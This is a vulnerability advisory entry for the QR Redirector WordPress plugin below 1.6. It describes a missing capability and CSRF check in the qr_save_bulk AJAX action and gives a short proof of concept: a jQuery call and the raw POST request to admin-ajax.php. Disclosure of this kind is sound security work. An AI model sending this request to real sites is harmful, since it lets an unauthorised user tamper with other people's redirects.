WordPress Plugin Vulnerabilities
QR Redirector < 1.6 - Subscriber+ Arbitrary QR Redirect Response Status Update
Description
The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qr_save_bulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects
Proof of Concept
jQuery.post(ajaxurl, { qr_redirect_response: 308, post_ids: [830], action: "qr_save_bulk" }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 64 Connection: close Cookie: [any authenticated user] qr_redirect_response=308&post_ids%5B%5D=830&action=qr_save_bulk
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)